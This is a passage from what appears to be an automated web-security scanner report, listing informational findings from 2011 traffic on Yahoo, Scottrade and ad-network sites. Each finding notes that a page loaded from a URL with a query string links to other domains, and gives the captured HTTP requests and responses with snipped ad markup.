GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=realestate&f=750052199&l=LREC&en=utf-8&npv=1&rn=1315331397410&em=%7B%20%22site-country%22%3A%22us%22%2C%22site-state%22%3A%22ny%22%2C%22site-city%22%3A%22New%20York%22%2C%22site-dma%22%3A%22501%22%2C%22site-attribute%22%3A%22content%3Dno_expandable%22%20%7D HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; PREF=srp=b%3D1%26p%3D10010%26type%3Dclassified%26radius%3D%26lat%3D40.714550%26lon%3D-74.007124%26datelisted%3D%26priceLow%3D0%26priceHigh%3DUnlimited%26bedroomLow%3D%26searchName%3D%26bathroomLow%3D%26sqLow%3D0%26sqHigh%3DUnlimited%26proptype%3Dall%26n%3D10%26view%3Dlist%26sortBy%3Dfeat

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:57 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 10089

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128r7oge8(gid$_bb7.mKJhxXpARpjTl.wjQ92Mhd7ak5mFvUABrnR,st$1315313397464980,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.86. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /search/New_York/New_York/homes-for-sale

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 173778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>10010 Real Estate & Homes for Sale, 10010 Houses - Yahoo! Real Estate</titl
...[SNIP]...
<meta http-equiv="content-type" content="text/html; charset=UTF-8">


<link rel="stylesheet" type="text/css" href="http://yre.zenfs.com/static/css/4.3.25/yui-container-201105112120.css" />
<link rel="stylesheet" type="text/css" href="http://yre.zenfs.com/static/css/4.3.25/overlay-201105112120.css" />
<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/yui/2.5.2/build/reset/reset-min.css&d/lib/yui/2.7.0/build/fonts/fonts-min.css&qf/static/css/4.3.21/maple-global-201105050422.css&qf/static/css/4.3.21/map-201105050422.css&qf/static/css/4.3.25/srp-pdp-201105112313.css&qf/static/css/4.3.21/popup-201105050422.css&d/lib/uh/15/css/uh_rsa-1.0.5.css&qf/static/css/4.3.21/search-bar-srp-201105050422.css&qf/static/css/4.3.21/rss-201105050422.css&qf/static/css/4.3.32/listing-ad-201106170329.css&qf/static/css/4.3.21/showcasead-201105050422.css" />


<script type="text/javascript" charset="UTF-8">
...[SNIP]...
<div class="yre-header-ad">
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/a/lib/uh/15/css/uh_rsa-1.0.5.css" /><style type="text/css">
...[SNIP]...
Qs/Y=YAHOO/EXP=1315320588/L=m_XwnmKJhxXpARpjTl.wjQ9iMhd7ak5mFuwABTk1/B=m6MMQ9BDRm0-/J=1315313388445399/K=NkcIGSxgkOZlr2zFxVzD3Q/A=5877330/R=11/SIG=10tmhot8e/*http://realestate.yahoo.com" target="_top"><img id="ygmalogoimg" width="294" height="26" src="http://l.yimg.com/a/i/brand/purplelogo/uh/us/realestate_final.gif" alt="Yahoo! Real Estate"></a>
...[SNIP]...
<div id="yrePriceSliderMin"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" width="12" height="15" alt=""></div>
...[SNIP]...
<div id="yrePriceSliderMax"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" width="12" height="15" alt=""></div>
...[SNIP]...
<div id="yreSqSliderMin"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" alt=""></div>
...[SNIP]...
<div id="yreSqSliderMax"><img src="http://l.yimg.com/d/lib/yre/mycs/d/img/0.0.2/slider-pointer-on-200809101702.gif" alt=""></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/7b10885ba48b20f48bd77d522670fe5f/db0cc5a990cccac3b27d5fcf194bf4a3.jpg" alt="27 E 22ND ST FL 2ND home for sale "></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/d35c926e56ec811cde17683e34c6455a/c3763ca027cdef31df709f2dc347a440.jpg" alt="10 W End Ave # 23/24B home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xFQI9kZVGa7Ygsf_p6wsGw--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i6/i4698/IS1k5do4y6k3gkj.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/2db8b748fc874c4427c7f9b4f0bc9876/884fab6b26afc258cdf943d0b0076924.jpg" alt="15 E 26TH ST APT 19D home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/e31d882886c97ed0b1fd9ed3cda2b20/d6ed362d8a5fd16ca97453db3f2c38e3.jpg" alt="27 E 22nd St Apt 8 home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/2bc17f9d99fe1e53e61d640af5b4ec/4555288afbd7c49ec918b66affc513a.jpg" alt="13-21 E 22ND ST 8E home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/6c6450461cd0eca43686c33ba30543c/bc8b04eaf34c4e9e746a427347e63386.jpg" alt="50 Gramercy Park N Apt 6A home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/3f9eff2674b55b7238430388cb67ce9/7b08496a0e698c5523d2191265bbfc33.jpg" alt="1 Lexington Ave # 5CD home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xexGvxZreQ_WmR32QcVkOQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i0/i1983/ISye1hvz806y77.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/f49fe8ff4f584f4396c565dfda6241/bb56ad7c1119069b6c1bb1042a8eae1c.jpg" alt="305 E 24th St Apt 15K home for sale "></div>
...[SNIP]...
<div class='logo hfs'><img src='http://e.yimg.com/pf/api/res/1.2/xFQI9kZVGa7Ygsf_p6wsGw--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9OTA7aD0zMDtxPTcw/http://images.partners-z.com/is/image/i0/i6/i4698/IS1k5do4y6k3gkj.jpg'/></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/54ccaa0a2497eed21bcd352985173/cfe13699180f3c2aa5c14cf99856860f.jpg" alt="225 E 24th St # FL2 home for sale "></div>
...[SNIP]...
<div class="noscript"><img src="http://l.yimg.com/qf/re301/1d6fb1225f425f73fd6d557c6d525a2/65517c75900766d79356cd95c0617c70.jpg" alt="225 5th Ave Apt PHS home for sale "></div>
...[SNIP]...
</div>
<img src="http://iar.worthathousandwords.com/iar.gif?pid=9184"></img>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/9/50/43/86299B7715B8925213BA10322A7.jpg?pid=9184&qs=yvFTyvikq%7Dmhm%25Xhjp%27Fxzd%7Di-bi%7C%40%C2%80%7B%7E%2Fuxxmiuungo7gvn4xhjpltygwn%2A%7BuqCS%7Bykfszljp%27Sjgo%29Izufzh%2FhltBYhjvji%25Vu%7Ehloyodu%24Yffr%23Nw%7Bbyk%23osy%21Fro%29Pvdfr%23%5Bihm%25Kv%7De%7Bf%25Rl%7Cxpoly1 height = "50px" </img></span>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/3/EF/67/5B36E433543E980647648FB9955.jpg?pid=9184&qs=yvFVlbq%26H%7Cxhuj%26Qn%7B%27Ztxn%2FekwB%7Dz%C2%802jpqjznpscftnnv5dts%29%7Dxs%3EWkdu%24Ltygwn%24Uf%7C%26%5Cxvr%27ikvFZptnz%23Lsse%7Ckou%24Ibsqh%7B%C2%B2%27utjd%C2%82%24-%21xkh%29esm%25rl%7Cxpoly%23rr%27umux%7Ceuex%26ro%24hsjgv%2A height = "50px" </img></span>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/2/7D/C3/8CB52A13AAF0A7B8C08B35C04F4.jpg?pid=9184&qs=yvFPhoi%26ixv%27Tfrh%29Ywtygwn%24UZ%2Bgg%7FA%7Ex%7C4yjrkf%7Cgwnvsbsj1lst%27yzoFPhoi%26ixv%27Tfrh%29Ywtygwn%24UZ%2Bjh%7CA%3D%21Fiunw%27ut%264%3B4%27Bhxh%7C%24Ovsz%2F%29Jptm2%23Qmrf1%26Fjqw-%25Xhue%7F height = "50px" </img></span>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/5/7C/6E/CACD1F50052E0EC1D084CCFBC3A.jpg?pid=9184&qs=yvFR%60%21Fxhj%24Yffr%23Nw%7Bbyk%29jh%7D%3E%5Ckllllsy4fxq6O%5E%2Cw%7DpDO%5E%26D%7Bih%21Wkdu%24Ltygwn%2AkfxCQn%7B%27Ztxn%29Eyff%26Kxqlt%25Lr%7B%24Zbqk%23%60m%7Bi%25Sxuxpqqk%23Ylvuty%23jrk%21Ikwjmsfi%26Lwjv%2F height = "50px" </img></span>
...[SNIP]...
<div id='z-beacon'><img width='1' height='1' src='http://beacon.partners-z.com/yre/20100908/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=cdd32416ccf6d25d56b9eb799da3215e&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search&'/></div>
...[SNIP]...
<input type="radio" name="recipientId" value="5747190" class="lb-agent-input" checked />
<img src='http://e.yimg.com/pf/api/res/1.2/3PxI.pdX4SbSjk3uXgcfXA--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9MzY7aD0zNjtxPTcw/http://photos2.zillow.com/is/image/i0/i8/i1503/IS1pms7ljoynmar.jpg?op_sharpen=1&qlt=90&hei=36&wid=36&size=48,48&scl=1'/>
<a href="/agent-profile;_ylt=AuIzBi3Ca8nhS3.ManlO1Rxn47Qs?agentid=5747190&reqid=h002-1261-4543-1-928036&page=search&cza=10010" target="_blank" class="agent-name">
...[SNIP]...
<input type="radio" name="recipientId" value="3000973" class="lb-agent-input" />
<img src='http://e.yimg.com/pf/api/res/1.2/XaOb6_Cz0VUkJBsMf1rldA--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9MzY7aD0zNjtxPTcw/http://photos1.zillow.com/is/image/i0/i6/i8508/IScok46260n8gz.jpg?op_sharpen=1&qlt=90&hei=36&wid=36&size=48,48&scl=1'/>
<a href="/agent-profile;_ylt=Avv4oYD6RX26_LtYAaI8lwdn47Qs?agentid=3000973&reqid=h002-1261-4543-1-928036&page=search&cza=10010" target="_blank" class="agent-name">
...[SNIP]...
<input type="radio" name="recipientId" value="3784882" class="lb-agent-input" />
<img src='http://e.yimg.com/pf/api/res/1.2/NDjwp2hEd1EgdGw_NhOIVQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9MzY7aD0zNjtxPTcw/http://photos3.zillow.com/is/image/i0/i0/i9931/IS12a0bzrkvsgpv.jpg?op_sharpen=1&qlt=90&hei=36&wid=36&size=48,48&scl=1'/>
<a href="/agent-profile;_ylt=Athag3x5VX9jft9zbTYjYHtn47Qs?agentid=3784882&reqid=h002-1261-4543-1-928036&page=search&cza=10010" target="_blank" class="agent-name">
...[SNIP]...
<div class="body">
<iframe src="http://show.partners-z.com/s/show?chan=YAHOO&prid=cdd32416ccf6d25d56b9eb799da3215e&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010"></iframe>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&d/lib/yui/2.5.2/build/container/container-min.js&qf/static/js/4.3.21/overlay-201105050424.js&qf/static/js/4.3.21/ult-strip-201105050424.js&d/lib/yui/2.5.2/build/connection/connection-min.js&d/lib/yui/2.5.2/build/cookie/cookie-beta-min.js&d/lib/yui/2.5.2/build/json/json-min.js&qf/static/js/4.3.21/util-201105050424.js&d/lib/yui/2.5.2/build/get/get-min.js&d/lib/yui/2.5.2/build/history/history-min.js&qf/static/js/4.3.21/mvc-201105050424.js&qf/static/js/4.3.21/srp-mvc-201105050424.js&qf/static/js/4.3.21/class-cycler-201105050424.js&d/lib/yui/2.5.2/build/dragdrop/dragdrop-min.js&d/lib/yui/2.5.2/build/animation/animation-min.js&d/lib/yui/2.5.2/build/slider/slider-min.js&qf/static/js/4.3.21/slider-201105050424.js&qf/static/js/4.3.21/rb-en-201105050424.js&d/lib/ult/ylc_1.9.js&qf/static/js/4.3.21/popup-201105050424.js&qf/static/js/4.3.21/header-201105050424.js&qf/static/js/4.3.21/location-srp-focus-201105050424.js&d/lib/uh/15/js/uh_rsa-1.0.9.js&d/lib/yui/2.5.2/build/autocomplete/autocomplete-min.js&qf/static/js/4.3.21/autocomplete-201105050424.js&qf/static/js/4.3.21/srp-saved-search-list-201105050424.js&qf/static/js/4.3.21/srp-save-search-201105050424.js&qf/static/js/4.3.21/srp-pagination-201105050424.js&qf/static/js/4.3.21/srp-refine-form-201105050424.js&qf/static/js/4.3.21/srp-map-toggler-201105050424.js&qf/static/js/4.3.21/srp-view-toggler-201105050424.js&qf/static/js/4.3.21/imageloader-201105050424.js&qf/static/js/4.3.21/srp-imageloader-201105050424.js&qf/static/js/4.3.21/srp-listing-201105050424.js&qf/static/js/4.3.21/srp-sort-control-201105050424.js&qf/static/js/4.3.21/ult-ylc-201105050424.js&qf/static/js/4.3.29/listing-ad-201105300129.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128nfkanm(gid$m_XwnmKJhxXpARpjTl.wjQ9iMhd7ak5mFuwABTk1,st$1315313388360586,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.87. http://redirect.rtrk.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693&amp;cid=837045&amp;tc=11090604520111271&amp;rl_key=e2e30c5686d91c3f4971163361e1b86a&amp;kw=233292&amp;dynamic_proxy=1&amp;primary_serv=utdi.reachlocal.net&amp;se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&amp;pub_cr_id=8668759748">here</a>
...[SNIP]...

15.88. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid%3DAM%7C46%7C1542%7C1206%7C131_@26rid%3DL%7C1736690_@26amvid%3DOPT_OUT_@26symbol%3DSPY HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313325:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:48:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...
3183;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid=AM|46|1542|1206|131_@26rid=L|1736690_@26amvid=OPT_OUT_@26symbol=SPY;'+rand;
   }
       function wsod_image37() {
       document.write('<a href="http://www.scottrade.com/investment-products/ira.html" target="_parent" onmousedown="cmsOOB37190()" title="Get Ready For Retirement. Choose the IRA that Fits your plans."><img style="border:none;" src="http://media.wsodcdn.com/5f7eefdbd0f4af885fc291827f23e4b0/iras.jpg" alt="Get Ready For Retirement. Choose the IRA that Fits your plans." /></a>
...[SNIP]...

15.89. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313355:B2|10:37:190:18:0:50961:1315313354:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:49:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 787

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/37.190.oob.302x255/**;10.3183;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html;'+rand;
   }
       function wsod_image37() {
       document.write('<a href="http://www.scottrade.com/investment-products/ira.html" target="_parent" onmousedown="cmsOOB37190()" title="Get Ready For Retirement. Choose the IRA that Fits your plans."><img style="border:none;" src="http://media.wsodcdn.com/5f7eefdbd0f4af885fc291827f23e4b0/iras.jpg" alt="Get Ready For Retirement. Choose the IRA that Fits your plans." /></a>
...[SNIP]...

15.90. http://search.keywordblocks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.keywordblocks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?dn=shopping.yahoo.com&crid=712228940&pid=7POF8V98Z&cpnet=rSJi3Vaa2nKBgvwrl34N8d7pTjDgp%2BiyZmghG15DhMe%2F70RimpLU0doYbwbgr4tv&size=300x250&requrl=http%3A%2F%2Fshopping.yahoo.com&cid=7CU2PK0I5 HTTP/1.1
Host: search.keywordblocks.com
Proxy-Connection: keep-alive
Referer: http://ads.media.net/medianet.php?cid=7CU2PK0I5&size=300x250&crid=712228940&ran=0.19952531741000712
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: 59vt6285872293003050=CLNoYiXCEmm2%2FJtx3s0qnnD%2FYKxOT0hIOqnvdXCDd2hpFyQZQrnLrgVbu9Qp7Kq2; path=/; domain=search.keywordblocks.com; httponly
Content-Type: text/html; charset=UTF-8
Content-Length: 8515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="tids" content="a='955' b='3776' c='shopping.yahoo.com' d='site_default_template_id
...[SNIP]...
<div id="media-ad-footer"><a target="_blank" href="http://media.net/">ads by media.net</a>
...[SNIP]...

15.91. http://search.keywordblocks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.keywordblocks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?dn=autos.yahoo.com&crid=717009282&pid=7POI9N8KL&cpnet=zBEazVOF9oRZUx591TuhSWtqIwgpof8uoKiwzIxYxbbZLdGHgYfUW1G4u8WvGw1d&size=728x90&requrl=http%3A%2F%2Fautos.yahoo.com%2Fdarla%2Fmd.php%3Fen%3Dutf-8&cid=7CU9K3MPS HTTP/1.1
Host: search.keywordblocks.com
Proxy-Connection: keep-alive
